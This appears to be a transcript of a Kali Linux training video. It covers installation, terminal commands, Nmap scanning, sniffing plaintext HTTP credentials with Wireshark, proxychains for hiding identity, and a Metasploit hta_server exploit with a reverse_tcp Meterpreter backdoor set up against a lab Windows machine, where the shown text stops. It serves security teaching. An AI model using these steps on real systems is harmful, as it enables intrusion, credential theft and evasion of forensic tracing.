On the first screen we choose how to proceed with the installation; there is a "Start installer" option, so we press Enter on that and wait for things to load from the ISO file. The first step in the installation is choosing the language of the operating system, for which we go with English as standard. Next is the location, used for setting the time and some internal settings that depend entirely on the location of the user; here we go with India. For configuring the keyboard, it is always recommended to go with American English first. Many people make the mistake of choosing a local layout right away, which causes a lot of issues later on; if another keyboard layout turns out to be necessary, it can be installed later, but as a base we should always stick with American English. At this point the installer loads its components from the ISO file; it is a big file of about 3.6 GB with a lot of components to copy into the virtual machine, and it also detects the hardware.
Once the hardware and network configuration is done, we are asked to write a hostname for the system. The hostname can be anything; it is used to recognize this device on a local network, so let's use the name "kali." The domain name can be skipped for now; it is not necessary for this installation. Then comes the full name for the user, which we can provide as "simplilearn." Next we set up a username, which identifies this user account as distinct from the root account and any accounts created later; for now we can give something like "simplilearn123." Now we choose a password for the user. Remember, since this is the first user added to this newly installed operating system, it effectively serves as the administrator's password; use whichever password you like, repeat it below, and press Continue.

At this point the installer detects the components on which the operating system can be installed. There are multiple options: use the entire disk, use the entire disk and set up LVM, or use the entire disk and set up encrypted LVM. For newcomers it is recommended to use the first option, since LVM and encryption are things you can learn once you are much more hands-on with the Linux operating system; so we choose the guided "use entire disk" installation and press Continue. When we set up the virtual machine on VMware we configured a disk capacity of 20 GB, and that is the hard disk being discovered here; even though it is a virtual disk on VMware, it acts as a normal hard disk on which an operating system can be installed. We select it and press Continue. Next is the partitioning scheme: an installed operating system has different components, one area keeping the applications, one for files, another for RAM (swap) management, and so on. For newcomers it is always recommended to keep everything in one partition, so we select that and press Continue. We then see an overview of the partitions it is going to create: a primary partition of 20.4 GB and a logical partition of about 1 GB used for swap memory. This kind of naming can be confusing for people not well versed in Linux or virtualization in general, but we can go ahead and press Continue, select "Finish partitioning and write changes to disk," and continue again. A confirmation page shows that SCSI3 is our 20 GB virtual hard disk; to write the changes to the disk, we press Yes and click Continue.

At this point the installation has started. It will take a while, depending on the amount of RAM provided, the processors provided, and how much the host machine constrains performance: on quicker systems this is rather quick, while on smaller ones it takes a while. Since this run is on a virtual machine with only 2 GB of RAM, we speed up this part of the video rather than watch the progress bar.

Now that the core installation is completed, we are asked to configure a package manager. A package manager on a Linux operating system plays the same role as the Google Play Store on Android devices or the App Store on Apple devices: it is the interface for installing external applications that are not installed by default, say Google Chrome or another browser for the internet. Asked whether to select a network mirror, we choose Yes and move forward, and the HTTP proxy prompt that follows can be left blank before pressing Continue.
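Once the system is up, that package manager is APT, driven from the terminal. A typical sketch (the `chromium` package name is just an example of an application that isn't bundled):

```bash
sudo apt update                  # refresh the package lists from the configured mirror
sudo apt install -y chromium     # install an application that isn't there by default
sudo apt full-upgrade -y         # pull in the latest versions of everything installed
```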
At this point the installer looks for updates to the Kali Linux installation, fetching the newest builds from the Kali servers so the installation ends up on the latest version. With the package manager configured, we reach the GRUB bootloader. GRUB is used for selecting the operating system while booting up; its core functionality is to allow the operating system to be loaded correctly, without faults. So when asked to install the GRUB bootloader to the primary drive, we select Yes and press Continue. Remember, the installation was conducted on /dev/sda, so we select that same configured hard disk for the GRUB installation and continue; the GRUB bootloader is now being installed. GRUB is highly essential because it tells the machine where to start loading the operating system from: even if the operating system is installed correctly and all the files are in order, the absence of a bootloader means the OS will not launch properly. As you can see, the installation is finally complete, so we press Continue and it finalizes the changes.

Kali Linux now boots up straight away; it doesn't check for the ISO file anymore, since the operating system is installed on the virtual hard disk storage we configured before. We enter the username and password we set up earlier, and the Kali Linux system boots to its homepage. Here we can see the installed applications, which are used for penetration testing by security analysts worldwide; all of these come pre-installed with Kali Linux, and others can be installed using the APT package manager we configured. Our full name appears at the top, and with this, our installation of Kali Linux is complete.

It's no secret that the vast bulk of our internet usage is vulnerable to hacking, whether through hazardous messaging apps or faulty operating systems, and penetration testing has become the norm for vulnerability assessment in order to fill this vacuum in digital security. Kali Linux, a distribution designed specifically for penetration testers, is a well-known operating system in this fight against hackers, with layers of features that we will go over in today's lesson, along with some of the tools the operating system has to offer. The topics: we start by learning the requirements that call for an operating system like Kali Linux, then its core features and intricacies. Moving on, we take a look at the five distinct stages of penetration testing that dictate the flow of vulnerability assessment in general. Next we learn about some important tools found on Kali Linux that are geared specifically toward ethical hacking purposes, and finally we have an extensive demonstration covering basic terminal commands, proxy tools, and a couple of highly regarded pieces of software at the crux of the operating system.

Let's start with why one should learn Kali Linux in the first place. In today's world, an organization's most valuable asset is its information or data. This is true for all kinds of businesses, public or private; on a daily basis they all deal with enormous amounts of sensitive information.
As a consequence, terrorist groups, hacking teams, and cyber thieves often attack them. To ensure safety and protection, businesses use a variety of security measures and update them regularly. Organizations must be proactive in this age of digitalization, regularly assessing and upgrading their security, because every day hackers discover new methods to breach firewalls. Ethical hackers, or white hat hackers, provide a fresh perspective on security: they conduct penetration tests to validate security measures. Generally, they will penetrate your networks and give you relevant information about your security posture, and once an organization has this knowledge, it can upgrade its security procedures accordingly.

Kali Linux serves this work directly. As noted earlier, its latest version ships with more than 600 pre-installed penetration tools, curated after the developers reviewed everything included in BackTrack and eliminated tools that did not work or duplicated others. Occasionally, when conducting penetration testing or hacking, we must automate our activities, since there may be hundreds of conditions and payloads to test, and manually examining everything is time-consuming; to improve productivity we use the tools that come prepackaged with Kali Linux, which not only save time but also accurately capture and process the data. The same small trusted team commits all packages and interacts with the repositories over multiple secure protocols, keeping critical code bases away from external assets and greatly reducing the risk of source contamination. True multilingual support lets users operate in their native language and locate the tools they need for the job, and ARM support remains as robust as the team can manage, with fully working installations on a wide range of ARM devices and ARM repositories integrated with the mainline distribution, so tools for ARM are updated in conjunction with the rest of the distribution.

To recap the core features for this lesson: Kali Linux, formerly known as BackTrack Linux, is the open-source, Debian-based distribution aimed at advanced penetration testing and security auditing, carrying several hundred tools for penetration testing, security research, computer forensics, and reverse engineering, accessible and freely available to information security professionals and hobbyists across platforms. Its networking components come disabled by default to prevent external factors from affecting the installation procedure, which may pose a risk in critical environments; apart from boosting security, it allows a deeper element of control to the most enthusiastic of users.
Let us now take a look at the five stages, or phases, of penetration testing:

1. Reconnaissance. The security researcher collects information about the target. This can be done passively, gathering information without ever contacting the target, actively, or both. It helps security firms gather details about the target system: network components, active machines, open ports and access points, operating system details, and so on. This activity is performed using information available in the public domain as well as different tools.
2. Scanning. This phase is more tool-oriented than manual: the penetration tester runs one or more scanner tools, such as war dialers, port scanners, network mappers, and vulnerability scanners, to gather more information about the target, collecting as many vulnerabilities as possible so the attack can be carried out in a more sophisticated way.
3. Gaining access. The penetration tester tries to establish a connection with the target and exploit the vulnerabilities found in the previous stage. Exploitation may involve buffer overflow attacks, denial of service (DoS) attacks, session hijacking, and many more; essentially, the tester extracts information and sensitive data from servers by gaining access using different tools.
4. Maintaining access. The penetration tester tries to create a backdoor for himself. It helps him identify hidden vulnerabilities in the system and can later act as a gateway to retrieve control of the system.
5. Covering tracks. The penetration tester tries to remove all logs and footprints that would help the administrator identify his presence. This helps the tester think like a hacker and perform corrective actions to mitigate such activities.

Now that we understand the basics of penetration testing and how ethical hackers go about it, let us take a look at some notable tools that can be used on Kali Linux. At the top of the chain lies Nmap. Nmap is a free and open-source port scanner used for network discovery and security auditing; many system and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. It is most beneficial in the early stages of ethical hacking, when a hacker must figure out a possible entry point to a system before running the necessary exploits, leveraging any insecure openings to breach the device; it belongs to the scanning phase of penetration testing. Nmap uses raw IP packets in novel ways to determine which hosts are available on the network, which services those hosts are offering, which operating systems and versions they are running, what type of packet filters and firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks but works fine against single hosts as well. Since every application that connects to a network needs to do so via a port, the wrong port or server configuration can open a can of worms, leading to a thorough breach of the system and, ultimately, a fully hacked device.
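A couple of representative Nmap invocations, with placeholder lab addresses; scan only machines you own or are authorized to test:

```bash
sudo nmap -sV -O 192.168.1.10     # detect service versions and fingerprint the OS
nmap -p 1-1000 192.168.1.0/24     # sweep the first 1000 ports across a /24 subnet
```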
Next on the list we have Metasploit. The Metasploit framework is a very powerful tool, usable by cybercriminals as well as ethical hackers, to probe systemic vulnerabilities on networks and servers as part of the third stage of penetration testing. It is an open-source framework that can be easily customized and used with most operating systems. With Metasploit, an ethical hacking team can use ready-made or custom code and introduce it into a network to probe for weak spots, as another flavor of threat hunting; once flaws are identified and documented, the information can be used to address systemic weaknesses and prioritize solutions. Once a particular vulnerability is identified and the exploit is fed into the system, a host of options open up for the hacker; depending on the vulnerability, hackers can even run root commands from the terminal, allowing complete control over the activities of the compromised system as well as all personal data stored on the device. A big advantage of Metasploit is the ability to run full-fledged scans on a target system, giving a detailed picture of that system's security index, along with the exploits that can be used to bypass firewalls and antivirus software. Having a single solution that gathers almost all the necessary points of attack is very useful for ethical hackers and penetration testers, as denoted by its high rank in this list.

At number three we have Wireshark. Wireshark is the world's foremost and most widely used network protocol analyzer: it lets you see what is happening on your network at a microscopic level, and it is the de facto standard across many commercial and nonprofit enterprises, government agencies, and educational institutions. Wireshark is a popular open-source tool that captures network packets and converts them from binary into a human-readable format. It provides every single detail of an organization's network infrastructure: the information collected through Wireshark can be used for purposes such as real-time or offline network analysis, and identification of the traffic coming onto your network, its frequency, and its latency between specific hops, which helps network administrators generate statistics based on real-time data. Wireshark is also a cross-platform tool that can be installed on Windows, Linux, and Mac systems, enabling hackers on all ecosystems to monitor network traffic irrespective of the operating system, and the development team is determined to maintain this level of freedom for their users in the foreseeable future.

The next tool on our list is airgeddon, which is part of the third phase of penetration testing. It is a multi-use bash script for Linux systems used to hack and audit wireless networks, like our everyday Wi-Fi routers and their counterparts, and it can also launch denial-of-service attacks on compromised networks. This multi-purpose Wi-Fi hacking tool is very feature-rich, supporting multiple methods of Wi-Fi hacking, including multiple WPS hacking modes, an all-in-one WEP attack, handshake file capturing, evil twin attacks, pixie dust attacks, and much more. It usually needs an external network adapter that supports monitor mode, which is necessary to capture the wireless traffic traversing the air. Thanks to its open-source nature, airgeddon can be extended with community plugins and add-ons, increasing its effectiveness against a wide variety of routers in both the 2.4 GHz and 5 GHz bands.

The next tool is John the Ripper, an open-source password security auditing and password recovery tool available for many operating systems. John the Ripper Jumbo supports hundreds of hash and cipher types, including those used for user passwords of operating systems, web apps, groupware, database servers, network traffic captures, encrypted private keys, file systems, and document files. Key features of the tool include multiple modes to speed up password cracking, automatic detection of the hashing algorithm used by the passwords, and the ease of running and configuring the tool, making it the password cracking script of choice for novices and professionals alike. It can use dictionary attacks along with regular brute-forcing to speed up the search for the correct password without wasting additional resources, and the word lists used in the dictionary attacks can be supplied by the user, allowing a completely customizable process.
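A minimal John the Ripper session might look like the following; `hashes.txt` is a hypothetical file of dumped password hashes, and the `rockyou.txt` wordlist ships with Kali (gunzip it first if it is still compressed):

```bash
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt   # dictionary attack
john --show hashes.txt                                        # list passwords cracked so far
```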
Now that we have covered the basics of Kali Linux, let us take a look at the agenda for our demo today. We start out with a few terminal commands that are a basic part of a Linux operating system, then configure our own proxychains to maintain anonymity while running penetration testing attacks on our victims. Next, we run a few Nmap scans on a local Windows 10 machine to find out the type of information that can be gathered in such a scenario. Moving on, we use Wireshark to monitor internet traffic and understand the importance of encryption and security when browsing the World Wide Web. Next, we learn about Metasploit and its various applications in the line of vulnerability assessment of a device, and finally we use Metasploit to take root access of a fully updated Windows 10 computer system.

Let's begin with some terminal basics on Kali Linux. When most people hear the term Linux, they envision a complex operating system used only by programmers; however, the experience is not as frightening as it appears. Linux is an umbrella term for a collection of free and open-source Unix-like operating systems. There are many variants like Ubuntu, Fedora, and Debian; "distributions" is the more precise term. When using a Linux operating system, you will most likely utilize a shell, which is a command line interface that provides access to the operating system's services. The majority of Linux distributions ship with a graphical user interface (GUI) as their primary shell to facilitate user interaction, but a command line interface is recommended due to its increased power and effectiveness: by entering commands into the CLI, tasks that require a multi-step GUI procedure may be completed in a matter of seconds.

We can start the terminal by clicking on the prompt icon at the top. Once the terminal is open, we can type our commands. The first command we are going to look into is pwd, which stands for present working directory. If I write pwd and press enter, it shows the directory the terminal is being run in; right now that is the nf folder on my desktop, which is currently empty, with no contents. If I use another command known as mkdir, which stands for make directory, and write mkdir nf2 (short for new folder 2), then open up nf, you can see the new folder has been created. This is how the pwd and mkdir commands work.
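Put together as a terminal session, that part of the walkthrough looks roughly like this (the nf and nf2 folder names come from the demo):

```bash
pwd          # print the present working directory, e.g. /home/simplilearn/Desktop/nf
mkdir nf2    # create a new directory called nf2 inside it
ls           # list the contents to confirm nf2 now exists
```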
Another important command is used to change directories: the cd command. Let's say I am in nf and I want to create a new file in the nf2 folder; I have to shift into it with cd nf2. Now if I write pwd, it shows the present working directory as /home/simplilearn/Desktop/nf/nf2. cd is used to navigate Linux files and directories, and it requires either the full path or just the name of the directory; if we have to move to a completely different folder, we can use the entire path. We can also write cd .. and it will go back one folder, so the pwd will be just nf and not nf2. Let's say we want to go somewhere different: if we run cd /home/simplilearn, we land among the folders of that directory, such as Desktop, Documents, Downloads, and so on. From here we can again go to the Desktop using the same cd command, cross-check the change of directories, check the files again, and there we go: nf.

How did we know that? The command used to show the files and folders inside a directory is the ls command. ls can be used to view the contents of a directory; by default, this command displays the contents of your current working directory, and by adding parameters we can view the contents of other directories as well. There are also hidden files in Linux that cannot be shown with a plain ls. For example, if you go to cd /etc, which is a configuration folder for Linux, and write ls, you see the regular files; if you want to see the hidden files, we have to add one more parameter, like ls -a, and as you can see the number of files has increased this time. ls -al will show the hidden files along with the permissions that have been set for each file. As you can see, many of these files belong to root; some can be written to, some can only be read, and it differs from file to file. The ls -al command is used to check each file's permissions so they can be changed accordingly if needed.

The next command we can look at is the cat command, short for concatenate. It is one of the most frequently used commands, and it is used to print the contents of a file to the output. For example, let's say I create a document in this nf2 folder on the desktop: an empty file called efile. I'll open it, write "hello kali" in it, and save it. Now, to change directories from /etc back to nf2, we already know how to use the cd command with just the folder name; if we want to type the entire path, we can write cd /home, and as you can see, the shell prompts us to complete the name of the directory. At this point we just have to press Tab and it completes it for us. Next we enter Desktop, nf, and nf2, which brings us to the working directory; if we press ls, we can find our file here. As discussed, concatenate shows the contents of a file, so if we run cat efile, you can see the "hello kali" we wrote in the text file printed as output. We can also use it to create new files: if we write cat with output redirection to a new file name, such as cat > efile2, we can type anything ("hello kali again"), and once we press Ctrl+C, we can check efile2 and we have "hello kali again" stored in it.
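As a condensed recap of those commands, under the same folder layout as the demo:

```bash
cd ~/Desktop/nf/nf2   # jump into the nf2 folder (Tab completes path segments)
cd ..                 # go back up one level, to nf
ls -a /etc            # list /etc including hidden (dot) files
ls -al /etc           # long listing: permissions, owners, sizes
cat efile             # print the contents of efile
cat > efile2          # create efile2; type text, then press Ctrl+C (or Ctrl+D) to finish
```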
If I press ls, you can see we have two files here, and running cat efile2 prints "hello kali again"; this is how the concatenate command works.

Apart from this, files can be copied: there is a different command, called cp, which is used to copy files from one place to another. Mind you, this is not moving; it only copies. For example, our present working directory is currently the nf2 folder. Let's copy efile2 to the nf folder: we write cp efile2 and give the path of the nf folder, which is /home/simplilearn/Desktop/nf. Now if I press ls, I still find both files in nf2, since I only copied. To go back to the nf folder, we can again use cd /home/simplilearn/Desktop/nf (just nf, not nf2, this time), and this changes our present working directory back. Now when we press ls, we find the efile2 file and the nf2 folder, and we can confirm this using the GUI as well: this is the nf folder, and in it you can see the nf2 folder and the efile2 document. If I write cat efile2, we can see the contents of the file.

This can be done by moving as well. For example, if I go to cd nf2, the inner folder, it has both document files, efile and efile2. Let's say I want to move efile completely from nf2 to nf: instead of cp, the command I am going to use is mv. We write mv efile and again give the path of the destination folder, which is again /home/simplilearn/Desktop/nf. As you can see, efile has been moved from nf2 to nf; this is nf2, and we don't find efile here anymore. If we press cd .. to go back to nf and run ls, we find both files: efile, which we moved, and efile2, which we copied from the nf2 folder. This is how copying and moving work in the terminal. Each is just a simple one-line statement for something that would take a couple of clicks in a GUI, which is why the command line interface is considered so much more streamlined on Linux operating systems.
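In command form, using the same paths as the walkthrough:

```bash
cp efile2 /home/simplilearn/Desktop/nf   # copy: efile2 now exists in both nf2 and nf
mv efile  /home/simplilearn/Desktop/nf   # move: efile is removed from nf2 and placed in nf
cd .. && ls                              # back up to nf and confirm both files are there
```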
Another very important command on a Linux operating system is the sudo command. sudo is short for "super user do"; the command enables you to perform tasks that require administrative or root permissions. We can think of it as how we run programs as administrator on Windows systems. It is not advisable to use this for daily work, because it is easy for an error to occur and root permissions are very far-reaching, so beginners are advised to use the sudo command only when absolutely necessary. For example, sudo su: with this command I am giving this terminal root permission (su is commonly read as "substitute user" or "switch user"). At this point it asks for my admin password; once I enter it, I have root access. Note how the password I typed did not show up on screen. This is a security measure to prevent people from snooping on your root password, which effectively unlocks the entire operating system. You can also see the prompt symbol changed: a dollar symbol shows you are a standard user, and when you switch to root you see a hash symbol instead. This opens a separate shell inside the terminal; we can exit from the root user back to the standard user using the command exit, and once again we have the dollar sign, and root has vanished.

There are some commands that will only work with administrative access. For example, when updating the Kali Linux system with apt update as a standard user, it fails with "problem unlinking the file ... permission denied". Now let's try this with sudo: sudo apt update, and as you can see, it is updating the package repositories, which index the software installable on the system. This can be done either by writing sudo every time we want to perform a root action, or by writing sudo su once and then running apt update alone. For the second example, when I write sudo su this time, it does not ask me for the password, because in this terminal session I have already provided the root password once and it is cached. Earlier we had to write sudo apt update because we were running as a standard user; now that we are running as root, all we have to write is apt update, and it continues its work.

Another useful command is the ping command. It is pretty self-explanatory: it checks connectivity, either out to the internet or to a local server on your network that needs to be pinged. We write ping followed by either an IP address or a domain. Say we want to check whether we can reach google.com from this Kali Linux installation: we write ping google.com, and you can see the bytes being sent and received and how much time each request took. This can be done for local systems as well. This installation of Kali Linux is running in a virtual machine, and my host machine is also running, with the IP address 192.168.29.179; if I ping that from here, the time to complete each request is drastically lower than for a website on the internet, since it is on the local network. This is how the ping command works, and it can show you what kind of packets are transmitted, how many are received, whether there was any packet loss on the connection, and other details.

A very important command when working with the terminal for a long duration is the history command. Again pretty self-explanatory: with so many commands being run, people sometimes forget what change they made or what directory name they used. The history command helps recover the commands you have written; it doesn't go all the way back, but it lists many of the commands that were input in recent sessions. These are some of the most commonly used terminal commands; if you want to learn more about the terminal and its other features, please let us know in the comment section and we will try to make an in-depth tutorial specifically for terminal commands on Linux.
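A short session tying those administrative and diagnostic commands together (the host IP is the one from the demo; the -c flag, not used on screen, simply stops ping after a fixed number of probes):

```bash
sudo apt update            # refresh package indexes; prompts for your password once
sudo su                    # open a root shell; prompt changes from $ to #
apt update                 # as root, no sudo prefix is needed
exit                       # drop back to the standard user

ping -c 4 google.com       # four ICMP probes to an internet host
ping -c 4 192.168.29.179   # a LAN host answers far faster than an internet host
history                    # list recently entered commands
```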
Moving on, we learn how to configure proxychains on our system. Proxying refers to the technique of bouncing your internet traffic through multiple machines to hide the identity of the original machine, and a good tool that hackers use to accomplish this is proxychains. Essentially, you can use proxychains to run any program through a proxy server: it allows you to access the internet from behind a restrictive firewall, it hides your IP address, and it even lets you use multiple proxies at once by chaining them together. One of the most important reasons proxychains is used in a security context is to evade detection. Attackers often use proxies to hide their true identities while executing an attack, and when multiple proxies are chained together, it becomes harder and harder for a forensics professional to trace the traffic back to the original machine; when those proxies are located across countries, investigators would have to obtain warrants in the local jurisdiction of every proxy.

To see how proxychains works, let's open Firefox first and check our current IP address. We write firefox, and there we go. If we visit an address like myip.com, you can see it easily detects that our country is India, and it shows our public IP address. Now, back in the terminal, we can write proxychains -h; the -h flag brings up the help text, and from it we learn that proxychains has a config file at /etc/proxychains4.conf, through which we can customize how our proxy chain should work. To open it we need a text editor: on Windows we have Notepad and tools like Microsoft Word to edit documents; on Linux we have a tool called nano. To use nano, we run the command nano followed by the path of the file we want to edit, so we open /etc/proxychains4.conf, and here we see the config file.

There are three basic types of proxy chaining here. We have a strict chain, where all the proxies in the list will be used and chained in order; a random chain, where each connection made through proxychains uses a random combination of proxies from the proxy list; and a dynamic chain, which is the same as a strict chain except that dead proxies are excluded from the chain. We can set up whichever type we want: to enable or disable a particular type, we use the hash (comment) symbol. Right now all of these lines have a hash symbol in front except dynamic_chain, so the dynamic chain is the one currently in use.
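For reference, the relevant part of /etc/proxychains4.conf looks roughly like this; the ProxyList entry shown is the file's default, which points at Tor's local SOCKS port:

```
# Exactly one chain type should be uncommented at a time:
dynamic_chain
#strict_chain
#random_chain

[ProxyList]
# Default entry: route through the local Tor SOCKS proxy
socks4 127.0.0.1 9050
```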

To use the strict chain method instead, I would add a hash in front of dynamic_chain and remove the hash in front of strict_chain; at any point in time, exactly one of these types should be enabled. Let's stay with the dynamic chain: we disable strict_chain by putting the hash back in front of it and uncommenting dynamic_chain. At the bottom, nano shows a few shortcuts for handling the editor; the ^ symbol stands for the Control key on your keyboard. To "write out", which is nano's term for saving the file, we press Ctrl+O; it asks for the file name to write, and since we want to overwrite proxychains4.conf rather than create a new file, we just press Enter. We get "permission denied". This happens because we opened the file as a standard user, and /etc is a system folder; to make changes we have to open it with sudo. We exit nano with Ctrl+X, clear the screen, and this time run sudo nano /etc/proxychains4.conf, and the same file opens again. Now if we make a change, say enabling strict_chain by removing its hash, and press Ctrl+O and then Enter, it says "Wrote 160 lines". To reverse the change, we put the hash back, re-enable dynamic_chain, press Ctrl+O and Enter, and again it says "Wrote 160 lines". Then we can exit straight away with Ctrl+X.

Right now we have not provided any proxy list of our own. We could add proxy IP addresses from the internet, but we would have to make sure they are safe and do not snoop on our data. When no extra proxies are provided, proxychains falls back to using the Tor network, but for that we have to start Tor, which runs as a service on Linux. To check it we use systemctl, which is used to query the status of services on a Linux operating system: sudo systemctl status tor. As you can see, the Tor service is described as an "anonymizing overlay network for TCP connections", and it is currently inactive. To start it, we write sudo systemctl start tor, and if we repeat sudo systemctl status tor, it is now active; you can see the green indicator.

To put Firefox behind the chain, we can use the proxychains command directly: we write proxychains firefox google.com and press Enter, the Firefox window launches, and it opens google.com. If we go to myip.com once again, we now have a different IP address, and the country shows as unknown as well. So this is how we can use proxychains to anonymize internet usage when using Kali Linux.
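The whole sequence from this segment, as commands:

```bash
sudo nano /etc/proxychains4.conf   # edit the chain type (Ctrl+O saves, Ctrl+X exits)
sudo systemctl status tor          # check whether the Tor service is running
sudo systemctl start tor           # start Tor; proxychains falls back to it by default
proxychains firefox google.com     # launch Firefox with its traffic routed through the chain
```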
Next on our agenda is scanning networks using Nmap. At its core, Nmap is a network scanning tool that uses IP packets to identify all the devices connected to a network. We can learn more about Nmap from its help output, which lists the parameters that can be used when scanning the ports of a system, along with the tool's version and URL. The primary uses of Nmap can be broken into three core processes. First, the program gives you detailed information on every IP active on your network, and each IP can then be scanned. Secondly, it can provide a list of live hosts and open ports, as well as identify the OS of every connected device. Thirdly, Nmap has become a valuable tool for users looking to protect personal and business websites: using Nmap to scan your own web server, particularly if you are hosting your website from home, essentially simulates the process a hacker would use to attack your site, and attacking your own site in this way is a powerful way of identifying security vulnerabilities.

As we already discussed, the host Windows 10 machine has the IP address 192.168.29.179. To run an OS scan against it, we first get root permission with sudo, and then launch nmap -O, the OS detection scan, with the IP address of the host system, 192.168.29.179; in a legitimate penetration testing scenario we would use the IP address of the vulnerable device here. We let it scan for a while, and it gives us some guesses as to what the OS might be. As you can see, the scan is done and it has shown some of the ports that are open, such as the MSRPC port and the HTTPS port 443, which is used to connect to the internet, and it offers some aggressive OS guesses as well: for example, it thinks there is a 94% chance this is Microsoft Windows XP Service Pack 3, partly because a lot of Windows XP-era components are still prevalent in modern Windows.

Now that OS detection is confirmed, there are many more details we can gather with Nmap. Let's use the nmap -A command, which captures as much data as possible. There is also a speed (or timing) setting, -T, which ranges from T0 all the way up to T5; this basically determines how aggressively the victim is scanned. If you scan slowly, it takes more time to produce results, but it also gives the intrusion detection system or firewall on the vulnerable machine less chance to notice that someone is trying to penetrate the network. For now, to go at a fairly high speed, we use T4 and provide the same IP address of the local machine I am targeting. It takes a little while, since it is trying to capture a lot of information. As you can see, the results are in: it scanned the top ports most likely to be vulnerable and showed a few open ones, along with 991 filtered ports that could not be attacked anyway since they were closed to outside access. It shows fingerprint details like connection policies and port specifics, the HTTP options and other intricate details that could be used when attacking its servers, the VMware version it is running, and a few other ports. Apart from that, we again get aggressive OS guesses, just as with -O, and this time it shows Windows 7 at 98%; there are no exact OS matches, since an exact match would show as 100% here.
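The two scans from this segment, as they would be typed (the target IP is the demo's host machine):

```bash
sudo nmap -O 192.168.29.179        # OS detection scan: open ports plus OS guesses
sudo nmap -A -T4 192.168.29.179    # -A: OS, service versions, scripts, traceroute; -T4: fast timing
```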
The output also includes a traceroute: the time and the path a connection request takes from the source to the destination. For example, this request went from 192.168.72.2 straight to the destination address; since this is a local machine, it took only a single hop. In many cases, if you are trying to reach a remote system, there will be a number of hops as the request jumps from firewall to firewall and router to router. This is how we can use Nmap to find information about a system and identify vulnerable ports we can access.

Moving on, we have a tutorial on how to use Wireshark to sniff network traffic. To start using Wireshark, we have to open the application first. During installation of Wireshark there is an option that controls whether non-root users are allowed to capture traffic; in my installation I disabled it, so I will be launching Wireshark as the root user. Also, to capture wireless data we need an external Wi-Fi adapter; you can see it in the VM's removable devices menu as an 802.11n WLAN adapter plugged into my USB port, and if I run iwconfig, it shows up as wlan0. An adapter with monitor mode support is not strictly required for sniffing our own traffic in Wireshark right now, but it will be necessary later in this tutorial, as we will see. For now we can start Wireshark by typing its name on the command line. It first asks which interface we want to capture on; for example, on eth0, which stands for Ethernet port zero, you can see data moving up and down, so we select eth0 and start capturing. You can see each request's source, destination, time, and the protocol it follows, and we can inspect the IPv4 flags as well.

To capture some internet traffic, we can run Firefox and browse to wikipedia.com; you can see the number of captured requests increasing, with application data flowing to a destination server at 103.102.166.224. But even if you inspect the Transmission Control Protocol flags and everything else, we cannot find anything useful: the payload is gibberish, which is exactly what it should be, since it is encrypted. That is because this is an HTTPS website; hence the lock symbol in the browser and the "connection is secure" indicator.

Now what about HTTP? We have seen many people recommend not visiting HTTP websites, and even if you have to, not providing any critical information on them. For example, let's go to a random HTTP page; the browser says the connection is not secure, because this is an HTTP page and not HTTPS. It has a login form, so let's check what information passes through it. Say I had a legitimate account here: I type my account name and a password of password1234 and press Login. The password does not match, because I do not actually have an account here, but suppose I did and was logged in as expected. Back in Wireshark we can use display filters: every request I sent was a TCP request, so I can write a filter of the form tcp contains "some string". For the username, I can filter on my account name and press Enter to find the request.
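The same filtering can be reproduced from the command line with tshark, Wireshark's terminal counterpart, if it is installed; a rough sketch, where the interface name and search string follow this demo:

```bash
# Capture on eth0 and show only HTTP traffic
sudo tshark -i eth0 -Y http

# Show only TCP packets whose payload contains the submitted username
sudo tshark -i eth0 -Y 'tcp contains "myaccountname"'
```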
The packet has many fields; if I expand the "HTML Form URL Encoded" section and open some of its values, I can see my account name and my password right there, the same details I input on the website. Had I owned a legitimate account on this site, I would have logged in without problems, but anyone sniffing the traffic with Wireshark could easily pull my credentials out of it. This is why it is recommended never to provide information on HTTP pages, where the security is not up to the mark, and to always look for the lock symbol when visiting any website, making internet transactions, or providing any information. That is how we can use Wireshark to watch transmissions and sniff packet data passing through a network adapter.

Next, we learn about Metasploit. The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS development. We open a terminal, switch to root, and launch Metasploit with the keyword msfconsole; it takes a little while to start. Once the Metasploit console has loaded, we can decide what type of attack we want to launch and which exploits to use against vulnerable targets. As we already discussed, I am running this virtual machine on a Windows 10 host, so if I open the command prompt on the Windows 10 side and run ipconfig, I can see the IP address of that local machine.

To attack that machine, let's see what kind of exploit will work there. We already know that Windows has some common vulnerabilities, and one of them involves HTA, an HTML Application, which, when passed the right payload, can be used to open a backdoor into a system. To get started in Metasploit, we run use exploit/windows/misc/hta_server (windows for the platform, misc for miscellaneous), and as you can see, it finds the module. Now there are some options we need to set for this exploit to go through; you can see them listed. There is a payload, which is the malicious code we will deliver through the HTML Application to open the backdoor; right now the payload is windows/meterpreter/reverse_tcp, which is exactly what we want. Next, LHOST and SRVHOST should point at the machine we are launching the attack from: in another tab, ifconfig shows our Kali machine's IP address is 192.168.72.130, so we set LHOST to 192.168.72.130, do the same for SRVHOST, and set the port on which we want to catch the backdoor connection. This payload will open a backdoor and give us Meterpreter access to the system; Meterpreter can be thought of as an upgrade over a normal command prompt shell, and we will look into it once we get access. Now that the options are set, we type exploit and press Enter, and we get a URL. We copy this URL, take it to the browser on the target, and paste it; this asks us to download a file.
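Collected as an msfconsole session, the setup from this segment would look roughly like this (the IP values are the demo's; SRVPORT and LPORT defaults may differ per setup):

```
msf6 > use exploit/windows/misc/hta_server
msf6 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/misc/hta_server) > set LHOST 192.168.72.130
msf6 exploit(windows/misc/hta_server) > set SRVHOST 192.168.72.130
msf6 exploit(windows/misc/hta_server) > exploit
```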
